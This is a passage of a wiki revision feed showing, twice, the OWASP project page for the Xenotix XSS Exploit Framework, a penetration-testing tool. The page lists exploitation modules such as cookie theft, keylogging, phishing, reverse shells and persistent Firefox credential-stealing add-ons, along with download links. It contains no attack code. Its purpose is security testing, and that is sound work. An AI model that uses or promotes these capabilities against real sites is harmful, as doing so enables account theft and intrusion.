* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Manual Mode&lt;br /&gt;
*GET Request Auto Mode&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
*Multiple Parameter Scanner&lt;br /&gt;
*POST Request Scanner&lt;br /&gt;
*Request Repeater&lt;br /&gt;
*URL Fuzzer&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
*Browser Fingerprinting&lt;br /&gt;
*Browser Features Detector&lt;br /&gt;
*Get Network IP&lt;br /&gt;
*Ping Scan&lt;br /&gt;
*Port Scan&lt;br /&gt;
*Internal Network Scan&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Phisher&lt;br /&gt;
*Tabnabbing&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*Gram WebCam Screenshot&lt;br /&gt;
*Executable Drive By&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Drive-By Reverse Shell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Firefox Reverse Shell Addon (Persistent)&lt;br /&gt;
*Firefox Session Stealer Addon (Persistent)&lt;br /&gt;
*Firefox Keylogger Addon (Persistent)&lt;br /&gt;
*Firefox DDoSer Addon (Persistent)&lt;br /&gt;
*Firefox Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
*Firefox Download and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''UTILITY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Payload Encoder&lt;br /&gt;
*JavaScript Beautify&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Download.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]&lt;br /&gt;
MD5: bdfce2d4af4012ecc20b86bed876a54a&lt;br /&gt;
====Requirements====&lt;br /&gt;
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Version 5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|loZSdedJnqc}}&lt;br /&gt;
&lt;br /&gt;
'''Version 4.5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|jm1-_nTlhzY}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 4 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|dCo5BCJWOdA}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 3 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|CJEgO4_kd-8}} &lt;br /&gt;
{{#ev:youtube|owfF9C_Xerw}} &lt;br /&gt;
{{#ev:youtube|i8c3kf4t6A8}} &lt;br /&gt;
{{#ev:youtube|IT-8IH3yRrA}} &lt;br /&gt;
{{#ev:youtube|cgLGgVWvi9Y}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:Projects/OWASP Xenotix XSS Exploit Framework | Project About}}&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=175214</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=175214"/>
				<updated>2014-05-18T09:40:29Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework 5==&lt;br /&gt;
&lt;br /&gt;
[[Image:XenotixV5.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1600+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. Xenotix Scripting Engine allows you to create custom test cases and addons over the Xenotix API. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Download.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Manual Mode&lt;br /&gt;
*GET Request Auto Mode&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
*Multiple Parameter Scanner&lt;br /&gt;
*POST Request Scanner&lt;br /&gt;
*Request Repeater&lt;br /&gt;
*URL Fuzzer&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
*Browser Fingerprinting&lt;br /&gt;
*Browser Features Detector&lt;br /&gt;
*Get Network IP&lt;br /&gt;
*Ping Scan&lt;br /&gt;
*Port Scan&lt;br /&gt;
*Internal Network Scan&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Phisher&lt;br /&gt;
*Tabnabbing&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*Gram WebCam Screenshot&lt;br /&gt;
*Executable Drive By&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Drive-By Reverse Shell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Firefox Reverse Shell Addon (Persistent)&lt;br /&gt;
*Firefox Session Stealer Addon (Persistent)&lt;br /&gt;
*Firefox Keylogger Addon (Persistent)&lt;br /&gt;
*Firefox DDoSer Addon (Persistent)&lt;br /&gt;
*Firefox Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
*Firefox Download and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''UTILITY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Payload Encoder&lt;br /&gt;
*JavaScript Beautify&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Download.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]&lt;br /&gt;
&lt;br /&gt;
Requirements&lt;br /&gt;
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Version 5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|loZSdedJnqc}}&lt;br /&gt;
&lt;br /&gt;
'''Version 4.5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|jm1-_nTlhzY}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 4 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|dCo5BCJWOdA}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 3 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|CJEgO4_kd-8}} &lt;br /&gt;
{{#ev:youtube|owfF9C_Xerw}} &lt;br /&gt;
{{#ev:youtube|i8c3kf4t6A8}} &lt;br /&gt;
{{#ev:youtube|IT-8IH3yRrA}} &lt;br /&gt;
{{#ev:youtube|cgLGgVWvi9Y}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
